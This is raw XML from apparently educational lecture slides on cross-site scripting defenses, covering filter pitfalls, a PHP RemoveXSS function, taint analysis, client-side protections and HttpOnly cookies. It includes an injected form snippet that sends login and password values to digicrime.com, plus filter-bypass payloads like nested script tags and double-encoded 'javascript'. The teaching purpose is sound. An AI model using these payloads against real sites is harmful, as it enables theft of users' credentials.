                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    hackImg.src='http://www.digicrime.com/'+document.for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    ms(1).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>login.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'+':'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(1).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>password.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>;" &lt;/form&gt;</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905000" y="2667000"/>
            <a:ext cx="23431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7" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1924050" y="4095750"/>
            <a:ext cx="32575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8" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Problems with filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52229" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Suppose a filter removes &lt;script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Good case</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&lt;script src=“ ...”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>  src=“...”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>But then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>&lt;scr&lt;scriptipt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>src=“ ...”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&lt;script src=“ ...” </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Pretty good filter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1295400"/>
            <a:ext cx="8991600" cy="5410200"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>function RemoveXSS($val) { </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   // this prevents some character re-spacing such as &lt;java\0script&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   // straight replacements ... prevents strings like &lt;IMG SRC=&amp;#X40&amp;#X61&amp;#X76&amp;#X61&amp;#X73&amp;#X63&amp;#X72&amp;#X69&amp;#X70&amp;#X74&amp;#X3A &amp;#X61&amp;#X6C&amp;#X65&amp;#X72&amp;#X74&amp;#X28&amp;#X27&amp;#X58&amp;#X53&amp;#X53&amp;#X27&amp;#X29&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $search = 'abcdefghijklmnopqrstuvwxyz'; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $search .= '1234567890!@#$%^&amp;*()'; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $search .= '~`";:?+/={}[]-_|\'\\'; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   for ($i = 0; $i &lt; strlen($search); $i++) { </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>      $val = preg_replace('/(&amp;#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>      $val = preg_replace('/(&amp;#0{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   }     </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $ra1 = Array('javascript', 'vbscript', 'expression', 'applet', ...); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', ...); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $ra = array_merge($ra1, $ra2); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $found = true; // keep replacing as long as the previous round replaced something </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   while ($found == true) { ...} </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   return $val; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3205163" y="6400800"/>
            <a:ext cx="5862637" cy="338138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://kallahar.com/smallprojects/php_xss_filter_function.php</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1371600" y="4724400"/>
            <a:ext cx="2743200" cy="4572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4275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3962400"/>
            <a:ext cx="2133600" cy="4572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4276" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>But watch out for tricky cases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54277" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7848600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Previous filter works on some input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Try it at http://kallahar.com/smallprojects/php_xss_filter_function.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>But consider this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   java&amp;#x09;script    Blocked;   &amp;#x09 is horizontal tab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   java&amp;#x26;#x09;script   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>  java&amp;#x09;script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Instead of blocking this input, it is transformed to an attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t>Need to loop and reapply filter to output until nothing found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Advanced anti-XSS tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Dynamic Data Tainting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Perl taint mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Static Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Analyze Java, PHP to determine possible flow of untrusted input</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Client-side XSS defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Proxy-based: analyze the HTTP traffic exchanged between user’s web browser and the target web server by scanning for special HTML characters and encoding them before executing the page on the user’s web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Application-level firewall: analyze browsed HTML pages for hyperlinks that might lead to leakage of sensitive information and stop bad requests using a set of connection rules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Auditing system: monitor execution of JavaScript code and compare the operations against high-level policies to detect malicious behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="20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609600" y="152400"/>
            <a:ext cx="7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>HttpOnly Cookies    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> IE6 SP1,   FF2.0.0.5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345541" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="1692275"/>
            <a:ext cx="1128713" cy="8382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2" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="1792288"/>
            <a:ext cx="914400" cy="609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rgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345543" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2530475"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 166667"/>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4" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2759075"/>
            <a:ext cx="1143000" cy="1524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5" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="2525713"/>
            <a:ext cx="400050" cy="385762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="252" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="249" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="147"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345546" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="1616075"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 26074"/>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rgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345547" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2073275"/>
            <a:ext cx="3581400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345548" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3705225" y="1600200"/>
            <a:ext cx="1203325" cy="461963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345549" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2301875"/>
            <a:ext cx="3581400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345550" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2362200"/>
            <a:ext cx="4800600" cy="1138238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>HTTP Header:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
